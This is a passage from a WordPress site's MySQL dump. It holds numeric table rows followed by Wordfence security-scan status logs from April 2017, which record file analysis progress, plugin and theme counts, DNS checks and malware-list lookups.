(24933558, 1546285845, 1),
(24933800, 1962951373, 1),
(24934027, 1374841142, 12),
(24934273, 2160581054, 1),
(24934292, 2160581054, 1),
(24934296, 2160581054, 1),
(24934297, 2160581054, 1),
(24934302, 2160581054, 1),
(24934317, 1538375237, 2),
(24934333, 2160581054, 1),
(24934351, 2160581054, 1),
(24934364, 2160581054, 1),
(24934366, 2160581054, 1),
(24934373, 2160581054, 1),
(24934419, 2160581054, 1),
(24934420, 2160581054, 1),
(24934461, 2160581054, 1),
(24934504, 1374769563, 5),
(24934505, 1374769563, 5),
(24934505, 2160581054, 1),
(24934521, 1055638166, 1),
(24934612, 2297635928, 1),
(24934613, 2297635928, 2),
(24934691, 1374769563, 10),
(24934729, 1374841142, 6),
(24934730, 1374841142, 6),
(24934827, 1374761077, 1),
(24934885, 1834549080, 1),
(24935604, 3154485134, 10),
(24935671, 2857634197, 1),
(24935751, 3154485134, 10),
(24935949, 1538774996, 1),
(24936071, 1538656104, 12),
(24936208, 1374769563, 10),
(24936249, 3154459133, 10),
(24936300, 1837280593, 15),
(24936587, 2150924393, 1),
(24936917, 1582084616, 1),
(24936973, 1538728574, 2),
(24937078, 782622681, 1),
(24937241, 1374769563, 10),
(24937311, 2499535434, 1),
(24937326, 760206499, 1),
(24937482, 1539837611, 6),
(24937562, 1374769563, 10),
(24937569, 2499535434, 1),
(24937699, 844599434, 4),
(24937700, 844599434, 26),
(24938049, 2499535434, 1),
(24938179, 1314247995, 1),
(24938264, 1374769563, 10),
(24938636, 1538656104, 12),
(24938854, 1538656104, 12),
(24938927, 1538656104, 12),
(24939009, 2499535434, 1),
(24939021, 1374769563, 10),
(24939034, 1374769563, 10),
(24939035, 1374839056, 1),
(24939590, 1123635012, 1),
(24939680, 1374769563, 10),
(24939720, 1538614733, 1),
(24939910, 783487407, 10),
(24939935, 1538773687, 1),
(24940129, 1842251139, 1),
(24940677, 621390105, 1),
(24940682, 629981398, 1),
(24940683, 3569402886, 1),
(24940753, 1603019490, 1),
(24940824, 844599431, 1),
(24940829, 2918037896, 1),
(24940909, 3639891570, 1),
(24940929, 2499535434, 1),
(24940973, 629981398, 1),
(24940976, 1822917694, 1),
(24940988, 3097104020, 1),
(24941043, 1540278613, 1),
(24941114, 784084240, 1),
(24941194, 1538457750, 1),
(24941195, 1833311020, 1),
(24941200, 1428090969, 1),
(24941202, 1475089271, 1),
(24941235, 2996488203, 1),
(24941331, 1833311020, 1),
(24941332, 2915925356, 1),
(24941431, 3652605758, 1),
(24941712, 1833311020, 1),
(24941767, 1374769563, 10),
(24941768, 1796538632, 1),
(24941803, 2994779638, 1),
(24941876, 1426952777, 1),
(24941974, 2509961569, 1),
(24942124, 1837280593, 12),
(24942316, 1338303090, 1),
(24942610, 1374769563, 10),
(24942871, 3233510666, 2),
(24943175, 3325711418, 1),
(24943370, 1374769563, 20),
(24943447, 1837280593, 12),
(24943648, 1306362424, 1),
(24943966, 3326599946, 1),
(24943987, 3075492304, 1),
(24944039, 1121751541, 1),
(24944214, 1439300774, 1),
(24944214, 1121751540, 1),
(24944304, 3559909632, 1),
(24944338, 1355389335, 1),
(24944588, 1837280593, 12),
(24944737, 1837280593, 12),
(24944750, 1837280593, 2),
(24944769, 2499535434, 1),
(24944815, 1538596638, 3),
(24944815, 1374769563, 10),
(24945018, 1357743298, 1),
(24945286, 1137866330, 1),
(24945684, 2644818921, 2),
(24945881, 3567663235, 2),
(24946240, 1427778051, 1),
(24946262, 1374769563, 10),
(24946454, 3250485790, 1),
(24946614, 1581879465, 1),
(24947211, 2493725349, 1),
(24947394, 1519853770, 1),
(24947443, 1439241202, 1),
(24947505, 1538656104, 12),
(24947666, 1374769563, 10),
(24948076, 3373404845, 3),
(24948094, 1837270443, 1),
(24948366, 856654116, 1),
(24948411, 2065606982, 1),
(24948631, 3267064321, 1),
(24949064, 1374769563, 10),
(24949310, 856638264, 1),
(24949324, 1796538632, 1),
(24949842, 3154458345, 8),
(24949843, 3154458345, 2),
(24949968, 3649587542, 1),
(24950938, 1091807106, 8),
(24950939, 1091807106, 9),
(24950980, 1314254639, 1),
(24951032, 3065287714, 1),
(24951287, 1539836988, 1),
(24951315, 1538656104, 12),
(24951491, 1538656104, 5),
(24951492, 1538656104, 7),
(24951598, 2745986199, 1),
(24952052, 1374769563, 10),
(24952454, 2499535434, 1),
(24952955, 1123631300, 1),
(24953055, 1114560586, 1),
(24953058, 1374769563, 10),
(24953288, 2032808987, 1),
(24953395, 1837280593, 12),
(24953439, 1374769563, 10),
(24953586, 1837280593, 12),
(24954168, 3166510073, 3),
(24954261, 1439283878, 1),
(24954491, 3233510666, 1),
(24954780, 1538656104, 12),
(24954784, 1837280593, 12),
(24954831, 1122253362, 1),
(24954854, 1837280593, 12),
(24954890, 1538656104, 12),
(24954927, 1374769563, 10),
(24955005, 1837280593, 12),
(24955969, 3024883602, 1),
(24956031, 1374769563, 10),
(24956072, 3567663235, 3),
(24956352, 1374769563, 10),
(24956462, 1837280593, 15),
(24956502, 2835380908, 1),
(24956974, 1374769563, 10),
(24957057, 2745986199, 1),
(24957483, 1374769563, 10),
(24957491, 3346287885, 1),
(24957652, 1570674744, 1),
(24957655, 1538362361, 1),
(24957805, 90545271, 1),
(24957889, 3428697494, 1),
(24957890, 3428697494, 1),
(24958398, 2001500246, 1),
(24958539, 3233508538, 4),
(24958621, 1382193106, 1),
(24958723, 1332607321, 1),
(24958925, 1540872198, 1),
(24959010, 1834585734, 1),
(24959072, 84491800, 1),
(24959076, 1374769563, 10),
(24959186, 1374769563, 10),
(24959339, 1538615370, 1),
(24959356, 1467349730, 1),
(24959428, 1426773780, 1),
(24959696, 3107604753, 1),
(24959699, 757167658, 1),
(24959702, 88944456, 1),
(24959838, 1347353146, 1),
(24959838, 1138992850, 1),
(24959909, 3254831113, 1),
(24959918, 1123633540, 1),
(24959982, 1474632318, 1),
(24960057, 1833311020, 1),
(24960070, 1370060441, 10),
(24960155, 2342691993, 1),
(24960203, 84519249, 1),
(24960464, 3587417960, 3),
(24960482, 1374769563, 10),
(24960509, 876568582, 1),
(24960518, 3000613671, 4),
(24960519, 3000613671, 6),
(24960520, 3000613671, 2),
(24960716, 1833311020, 1),
(24960795, 3349724530, 1),
(24960993, 1728497228, 1),
(24961315, 1374769563, 10),
(24961449, 1382193114, 1),
(24961717, 533672141, 1),
(24961863, 1837280593, 12),
(24961885, 1374769563, 10),
(24961947, 1833311020, 1),
(24961949, 1370067079, 1),
(24962067, 1837280593, 12),
(24962131, 609542472, 1),
(24962247, 3226577416, 1),
(24962330, 1837280593, 12),
(24962392, 1467349730, 1),
(24962849, 1538656104, 12),
(24962864, 1371104126, 1),
(24962866, 1538361201, 1),
(24962932, 1833311020, 1),
(24962970, 1405240484, 1),
(24963082, 1568498493, 1),
(24963317, 621928491, 1),
(24963318, 1540872244, 1),
(24963335, 1837280593, 5),
(24963336, 1837280593, 7),
(24963336, 1475494039, 1),
(24963385, 1833311020, 1),
(24963477, 1297196331, 1),
(24963511, 1538656104, 12),
(24963514, 1838045613, 10),
(24963974, 846466161, 1),
(24964637, 919627301, 1),
(24964693, 1375116803, 1),
(24964923, 1837280593, 12),
(24965082, 1374769563, 10),
(24965102, 1834526758, 1),
(24965165, 1314231423, 1),
(24965825, 1374769563, 10),
(24965825, 632922577, 1),
(24965831, 1834596186, 1),
(24965860, 695169303, 1),
(24966066, 1834584698, 1),
(24966441, 3362685302, 1),
(24966449, 3362685302, 1),
(24966450, 3362685302, 1),
(24966453, 3362685302, 1),
(24966459, 3362685302, 1),
(24966464, 3362685302, 1),
(24966478, 3362685302, 1),
(24966484, 3362685302, 1),
(24966486, 3362685302, 1),
(24966491, 3362685302, 1),
(24966495, 3362685302, 1),
(24966496, 3362685302, 1),
(24966508, 3362685302, 1),
(24966512, 3362685302, 1),
(24966653, 675805702, 1),
(24967059, 3350653525, 1),
(24967133, 2783005766, 1),
(24967270, 1374769563, 10),
(24967650, 1834596186, 1),
(24967796, 2025603832, 1),
(24967814, 2499535434, 1),
(24967967, 1837280593, 12),
(24968449, 1837280593, 12),
(24969115, 1570674722, 1),
(24969150, 1464061315, 1),
(24969297, 1538656104, 12),
(24969890, 3564054600, 1),
(24969947, 1538615370, 1),
(24970039, 1834559909, 1),
(24970113, 3166542325, 3),
(24970122, 1374769563, 10),
(24970129, 1833311020, 1),
(24970506, 1374769563, 10),
(24970595, 1833311020, 1),
(24970600, 1540278570, 1),
(24970671, 1364734211, 1),
(24970722, 1374769563, 10),
(24970843, 1837280593, 12),
(24970874, 1123631300, 1),
(24970898, 96995098, 1),
(24971151, 1338305565, 1),
(24971227, 1539836988, 1),
(24971396, 1540872244, 1),
(24971418, 1837280593, 12),
(24971558, 1426857626, 1),
(24971589, 1834609551, 1),
(24971621, 3233512354, 5),
(24971780, 1833311020, 1),
(24971854, 2513094943, 1),
(24971950, 633042990, 3),
(24972015, 1475494060, 1),
(24972052, 774130777, 1),
(24972074, 2917938538, 1),
(24972150, 3275627538, 2),
(24972161, 1475494071, 1),
(24972194, 1121751542, 1),
(24972284, 1123631300, 1),
(24972288, 1123631300, 1),
(24972300, 3104081691, 1),
(24972302, 1123631300, 1),
(24972313, 632837775, 10),
(24972372, 1753276934, 1),
(24972755, 1311686202, 1),
(24972759, 1123631300, 1),
(24972859, 1538512053, 1),
(24972922, 1837280593, 12),
(24972935, 1538656104, 12),
(24973171, 1538615370, 1),
(24973196, 1571470175, 1),
(24973196, 1833311020, 1),
(24973199, 1592224796, 1),
(24973256, 2745986199, 1),
(24973412, 1374769563, 10),
(24973424, 3104599145, 1),
(24973445, 2999997207, 1),
(24974091, 1833311020, 1),
(24974195, 90545227, 1),
(24974202, 1789313226, 1),
(24974357, 919627301, 1),
(24974441, 2989642493, 1),
(24974558, 632900847, 1),
(24974568, 1463834777, 1),
(24974996, 1374769563, 10),
(24975155, 1374769563, 10),
(24975830, 1374769563, 1),
(24975883, 1834514215, 1),
(24976003, 1512198042, 1),
(24976107, 1374769563, 10),
(24976291, 919627301, 1),
(24976340, 1336759242, 1),
(24976434, 1837280593, 12),
(24976505, 1374769563, 10),
(24976590, 1538704198, 2),
(24976637, 1374769563, 10),
(24977163, 3569402886, 1),
(24977164, 3569402886, 1),
(24977250, 2513051914, 1),
(24977251, 2513051914, 1),
(24977253, 2513051914, 1),
(24977302, 2513061429, 1),
(24977620, 632818382, 10),
(24977681, 1374769563, 10),
(24980654, 1055650208, 1),
(24980702, 2342670828, 1),
(24980723, 1538656104, 12),
(24980747, 1439284595, 1),
(24980775, 1439284595, 1),
(24980869, 1374776940, 1),
(24981133, 620874844, 1),
(24981357, 621375751, 1),
(24981682, 1837280593, 12),
(24982116, 1837280593, 12),
(24982166, 1355389035, 1),
(24982337, 1355291200, 1),
(24982885, 1592839955, 1),
(24982977, 1837161381, 1),
(24983147, 1538656104, 12),
(24983196, 1375116379, 1),
(24983209, 1539836988, 1),
(24983233, 1539836988, 1),
(24983235, 3645212876, 1),
(24983261, 1538359134, 1),
(24983585, 1401346405, 1),
(24983687, 1837264142, 1),
(24984175, 3024883608, 1),
(24984533, 1168357651, 1),
(24984536, 1731763595, 1),
(24984591, 1463838565, 3),
(24984610, 3250520646, 1),
(24984611, 3250520646, 2),
(24984611, 533387461, 1),
(24984682, 2679407696, 1),
(24984734, 2783008843, 1),
(24984816, 1306279988, 1),
(24984825, 872401474, 1),
(24984856, 872366560, 1),
(24984915, 1055593041, 1),
(24985088, 1255137841, 1),
(24985425, 621375750, 1),
(24985709, 2509959072, 1),
(24985828, 1538655055, 2),
(24986023, 1837384990, 1),
(24986124, 3154492423, 10),
(24986145, 3281714082, 1),
(24986607, 1998438315, 1),
(24986777, 1439267802, 1),
(24987273, 1837384990, 1),
(24987285, 1837384990, 1),
(24987311, 1209777137, 1),
(24987311, 1374822686, 1),
(24987312, 1538774068, 1),
(24987314, 1374822686, 1),
(24987484, 1539836988, 1),
(24987587, 2783008843, 1),
(24987704, 1538595673, 1),
(24987788, 3281714082, 1),
(24987945, 783509116, 3),
(24987946, 783509116, 7),
(24988092, 1538595673, 1),
(24988672, 2995873941, 1),
(24988743, 3103966404, 1),
(24988743, 3249721826, 4),
(24988860, 1796538632, 1),
(24989178, 3373404845, 3),
(24989502, 1430848841, 1),
(24990263, 3251245561, 1),
(24990264, 3251245561, 1),
(24990438, 1838091214, 4),
(24990439, 1838091214, 6),
(24991002, 1538595673, 1),
(24991263, 1600959233, 1),
(24991312, 3110395569, 1),
(24991568, 3024883602, 1),
(24991727, 608921439, 1),
(24991759, 1538595673, 1),
(24992110, 1463832178, 10),
(24992278, 1463832178, 2),
(24992278, 632835177, 5),
(24992279, 632835177, 3),
(24992293, 632920713, 1),
(24992804, 1539836988, 2),
(24992870, 1054002081, 1),
(24993161, 783504431, 8),
(24993161, 3273261683, 2),
(24993201, 1123635081, 1),
(24993249, 1837838730, 1),
(24993672, 1123633613, 1),
(24993772, 1463832178, 10),
(24993910, 757138080, 1),
(24994627, 1463832178, 10),
(24994791, 1463832178, 10),
(24994837, 633034955, 1),
(24994855, 3107193141, 1),
(24994967, 1463832178, 10),
(24994974, 1463832178, 10),
(24995051, 919627301, 1),
(24995242, 620874844, 1),
(24995370, 1837280593, 12),
(24995554, 1123632645, 1),
(24995786, 1379793056, 1),
(24995952, 3273261687, 10),
(24996043, 2631448407, 1),
(24996180, 1837280593, 12),
(24996263, 3154445620, 10),
(24996315, 1375118415, 1),
(24996410, 1332604279, 1),
(24996490, 3281714082, 1),
(24996715, 1375113052, 20),
(24996750, 1532393936, 1),
(24997407, 1375113052, 5),
(24997408, 1375113052, 5),
(24997494, 1532393936, 1),
(24997648, 1463955851, 10),
(24998140, 1332604279, 1),
(24998199, 3325718858, 1),
(24998534, 2499535434, 1),
(24998689, 1539836988, 1),
(24999056, 1332604279, 1),
(24999072, 3250483965, 1),
(24999204, 3154453301, 10),
(24999345, 1538656104, 12),
(24999508, 1375113052, 10),
(24999919, 3657082077, 1),
(25000205, 3373404845, 5),
(25000234, 2342668003, 1),
(25000258, 3652607482, 1),
(25000677, 3649630461, 1),
(25000759, 1538656104, 12),
(25000825, 1538656104, 12),
(25001011, 1375113052, 10),
(25001192, 1837280593, 12),
(25001447, 3233512354, 4),
(25001654, 1538656104, 12),
(25002206, 1742919172, 15),
(25002206, 1742919169, 14),
(25002233, 1742919172, 1),
(25002255, 1742919169, 1),
(25002357, 1538656104, 12),
(25002398, 1538656104, 12),
(25002447, 1538656104, 12),
(25002454, 1538656104, 12),
(25002605, 1837280593, 12),
(25003136, 1374958463, 1),
(25003195, 1055643623, 1),
(25003308, 1539836988, 1),
(25003340, 1463849781, 1),
(25003395, 621928491, 1),
(25003605, 1540278299, 1),
(25004286, 3281714082, 1),
(25004982, 1375113052, 10),
(25005276, 1375113052, 10),
(25005325, 1375113052, 10),
(25005868, 3281714082, 1),
(25006001, 1538358128, 1),
(25006394, 3256705680, 1),
(25006545, 1052827874, 1),
(25006679, 1427857479, 1),
(25006700, 1375113052, 1),
(25006701, 1375113052, 9),
(25006798, 3024883471, 1),
(25007010, 1538592859, 1),
(25007260, 1539836988, 1),
(25007749, 3250520646, 2),
(25007751, 3250520646, 1),
(25048499, 1123634998, 1),
(25049859, 1123634992, 1),
(25054047, 1405730122, 1),
(25099238, 1123631127, 1),
(25119338, 1123631127, 1),
(25138315, 1123631127, 1),
(25139863, 1123635013, 1),
(25146475, 1555588441, 1),
(25197590, 1123631127, 1),
(25213765, 1123631127, 1),
(25229901, 1123631813, 1),
(25232470, 1123631813, 1),
(25246608, 1123631127, 1),
(25297157, 1123631173, 1),
(25311785, 1123633541, 1),
(25323837, 3639886562, 1),
(25326117, 1123631813, 1),
(25328138, 1123631813, 1),
(25388369, 1123631173, 1),
(25404378, 1123635045, 1),
(25421230, 1123635045, 1),
(25432708, 1123633950, 1),
(25435915, 1123631127, 1),
(25445458, 1123631813, 1),
(25446110, 3587411701, 1),
(25454003, 3639886562, 1),
(25455573, 3639886537, 1),
(25462529, 2954829496, 6),
(25488416, 1123632542, 1),
(25500329, 1123631813, 1),
(25507765, 1123631752, 1),
(25534038, 1123632611, 1),
(25545656, 1123634076, 1),
(25591482, 3639886537, 1),
(25591826, 1123631752, 1),
(25600843, 1123631752, 1),
(25611417, 1123631772, 1),
(25644495, 1123631752, 1),
(25680958, 1123631752, 1),
(25688310, 1123631173, 1),
(25710637, 1123632581, 1),
(25719335, 1123631752, 1),
(25739388, 1123631301, 1),
(25742635, 1123631752, 1),
(25754441, 2509958044, 1),
(25758908, 1123631301, 1),
(25763983, 1123631752, 1),
(25765396, 1459547057, 1),
(25767260, 3639886537, 1),
(25769500, 1055649381, 1),
(25785985, 1123631813, 1),
(25795856, 1123631752, 1),
(25804107, 1123631295, 1),
(25807642, 1123631752, 1),
(25813292, 1123634975, 1),
(25820085, 1123633932, 1),
(25829962, 1123631557, 1),
(25830754, 1123634948, 1),
(25830873, 1123634948, 1),
(25841000, 1123631752, 1),
(25854039, 1123631748, 1),
(25858810, 1123631773, 1),
(25868274, 1123631553, 1),
(25878249, 1123631291, 1),
(25891910, 3267064321, 1),
(25897424, 1123631291, 1),
(25899816, 3639886537, 1),
(25907502, 1123635067, 1),
(25917158, 1123631835, 1),
(25917771, 1123631814, 1),
(25926908, 1123631553, 1),
(25941209, 1123634971, 1),
(25942191, 632885948, 1),
(25942193, 632885948, 1),
(25959222, 1123631291, 1),
(25971038, 1123631835, 1),
(25971592, 1538515997, 1),
(25980109, 1123631270, 1),
(25990503, 1123633937, 1),
(25991266, 1439284614, 1),
(25992778, 1837892844, 2),
(25999882, 1538574586, 1),
(26001758, 1584214706, 1),
(26008717, 1430572848, 1),
(26010470, 1123632443, 1),
(26031814, 1834531253, 1),
(26032267, 3639886537, 1),
(26032736, 1463961952, 1),
(26033164, 1123632422, 1),
(26041808, 1439284614, 1),
(26076695, 1837498020, 1),
(26078930, 1123634950, 1),
(26089014, 1123631835, 1),
(26089271, 3576813415, 1),
(26099670, 3746233170, 1),
(26113903, 1532393715, 1);

-- --------------------------------------------------------

--
-- Structure de la table `www2_wfStatus`
--

CREATE TABLE `www2_wfStatus` (
  `id` bigint(20) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `level` tinyint(3) UNSIGNED NOT NULL,
  `type` char(5) NOT NULL,
  `msg` varchar(1000) NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www2_wfStatus`
--

INSERT INTO `www2_wfStatus` (`id`, `ctime`, `level`, `type`, `msg`) VALUES
(118136, 1492290942.757329, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(117369, 1491943535.470579, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117368, 1491943535.282504, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117367, 1491943535.002886, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117035, 1491750762.636499, 2, 'info', 'Starting scan of file contents'),
(117036, 1491750763.659355, 2, 'info', 'Scanned contents of 28 additional files at 27.39 per second'),
(117037, 1491750764.664138, 2, 'info', 'Scanned contents of 40 additional files at 19.73 per second'),
(117038, 1491750765.608326, 2, 'info', 'Scanned contents of 86 additional files at 28.94 per second'),
(117039, 1491750765.609197, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117040, 1491750765.610905, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117041, 1491750766.458654, 2, 'info', 'Done host key check.'),
(117042, 1491750766.459760, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117205, 1491821934.460034, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117410, 1491943546.642670, 2, 'info', 'Starting password strength check on 3 users.'),
(117704, 1492108229.559657, 2, 'info', 'Found 14 plugins'),
(117703, 1492108229.393172, 2, 'info', 'Getting plugin list from WordPress'),
(117702, 1492108228.517528, 1, 'info', 'Contacting Wordfence to initiate scan'),
(118204, 1492320259.590769, 10, 'info', 'SUM_ENDOK:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118205, 1492320259.596038, 10, 'info', 'SUM_START:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(118203, 1492320259.572865, 2, 'info', 'Done examining URls'),
(118198, 1492320258.655249, 10, 'info', 'SUM_ENDOK:Scanning files for URLs in Google\'s Safe Browsing List'),
(118199, 1492320258.662800, 10, 'info', 'SUM_START:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118200, 1492320258.698980, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(118201, 1492320258.705119, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118202, 1492320259.571407, 2, 'info', 'Done host key check.'),
(117884, 1492265523.406181, 2, 'info', 'Found 4 themes'),
(117428, 1491988746.248769, 1, 'info', 'Scheduled Wordfence scan starting at Wednesday 12th of April 2017 09:19:06 AM'),
(117417, 1491943547.709762, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117416, 1491943547.709141, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117415, 1491943547.702207, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117414, 1491943547.699341, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117413, 1491943547.698433, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117893, 1492265526.746451, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(116952, 1491702317.195127, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(116961, 1491702318.963405, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(116953, 1491702318.066070, 2, 'info', 'Done host key check.'),
(117761, 1492108251.526786, 2, 'info', 'Done examining URls'),
(117760, 1492108251.526349, 2, 'info', 'Done host key check.'),
(116960, 1491702318.961621, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117272, 1491886398.011599, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117273, 1491886398.274547, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(116956, 1491702318.918813, 2, 'info', 'Done file contents scan'),
(117274, 1491886398.541811, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(116954, 1491702318.068558, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(116955, 1491702318.907870, 2, 'info', 'Done URL check.'),
(118029, 1492280432.016393, 10, 'info', 'SUM_START:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(118030, 1492280432.096740, 10, 'info', 'SUM_ENDOK:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(117705, 1492108229.564197, 2, 'info', 'Getting theme list from WordPress'),
(117706, 1492108229.608742, 2, 'info', 'Found 4 themes'),
(117402, 1491943545.675865, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117916, 1492265536.041093, 2, 'info', 'Analyzed 2400 files containing 37.48 MB of data so far'),
(117905, 1492265530.818478, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117906, 1492265531.127129, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117907, 1492265531.319452, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117908, 1492265531.766808, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117909, 1492265532.116014, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117910, 1492265533.270359, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117911, 1492265534.545924, 2, 'info', 'Analyzed 1900 files containing 30.45 MB of data so far'),
(117912, 1492265534.920306, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117913, 1492265535.152992, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117914, 1492265535.516772, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117915, 1492265535.755542, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117662, 1492072420.506504, 2, 'info', 'Done host key check.'),
(117391, 1491943542.992328, 2, 'info', 'Scanned contents of 40 additional files at 19.47 per second'),
(118088, 1492290933.534632, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117070, 1491750769.607819, 1, 'info', '-------------------'),
(117340, 1491943519.290776, 1, 'info', 'Scheduled Wordfence scan starting at Tuesday 11th of April 2017 08:45:19 PM'),
(117731, 1492108240.065961, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117730, 1492108239.674139, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(118089, 1492290933.935482, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(118090, 1492290934.108393, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(118091, 1492290934.377098, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118092, 1492290934.554513, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117805, 1492193116.421013, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117804, 1492193116.148815, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117285, 1491886402.670356, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117286, 1491886402.842688, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117287, 1491886403.129051, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(118058, 1492290925.910273, 2, 'info', 'Getting plugin list from WordPress'),
(118059, 1492290925.923969, 2, 'info', 'Found 14 plugins'),
(118060, 1492290925.927564, 2, 'info', 'Getting theme list from WordPress'),
(118061, 1492290925.953736, 2, 'info', 'Found 4 themes'),
(118062, 1492290925.971866, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(117816, 1492193120.302107, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117815, 1492193119.874227, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118024, 1492280431.118628, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(118023, 1492280431.076324, 10, 'info', 'SUM_START:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(117580, 1492058789.161984, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117282, 1491886401.226873, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117283, 1491886401.990081, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117284, 1491886402.407973, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117006, 1491750752.695505, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117370, 1491943535.745297, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117371, 1491943536.040442, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117372, 1491943536.415916, 2, 'info', 'Analyzed 1300 files containing 21.79 MB of data so far'),
(117373, 1491943536.589211, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117374, 1491943536.735433, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117375, 1491943536.958823, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117376, 1491943537.186348, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117377, 1491943537.944139, 2, 'info', 'Analyzed 1800 files containing 27.98 MB of data so far'),
(117378, 1491943538.738522, 2, 'info', 'Analyzed 1900 files containing 30.53 MB of data so far'),
(117487, 1491988779.343570, 2, 'info', 'Done file contents scan'),
(118065, 1492290929.968946, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(118240, 1499280689.843379, 2, 'info', 'Scanning comment with Author: Ann Weaver Email: bjzhzk@fjiauool.com Source IP: 81.171.81.55 '),
(118241, 1499280689.903410, 2, 'info', 'Checking 5 host keys against Wordfence scanning servers.'),
(117513, 1491988782.035408, 1, 'info', '-------------------'),
(117514, 1491988782.035769, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43923 records in 35 seconds.'),
(117784, 1492193101.472502, 1, 'info', 'Scheduled Wordfence scan starting at Friday 14th of April 2017 06:05:01 PM'),
(118164, 1492320247.312993, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(118163, 1492320247.077389, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118162, 1492320246.820239, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117922, 1492265537.041796, 2, 'info', 'Starting scan of file contents'),
(117923, 1492265538.151796, 2, 'info', 'Scanned contents of 28 additional files at 25.24 per second'),
(118193, 1492320257.747117, 2, 'info', 'Done host key check.'),
(118192, 1492320256.882616, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(118194, 1492320257.748417, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(118195, 1492320258.629653, 2, 'info', 'Done URL check.'),
(118196, 1492320258.649110, 2, 'info', 'Done file contents scan'),
(118197, 1492320258.650460, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(118177, 1492320251.905827, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(118171, 1492320249.560198, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(118172, 1492320249.701162, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(118173, 1492320249.978579, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
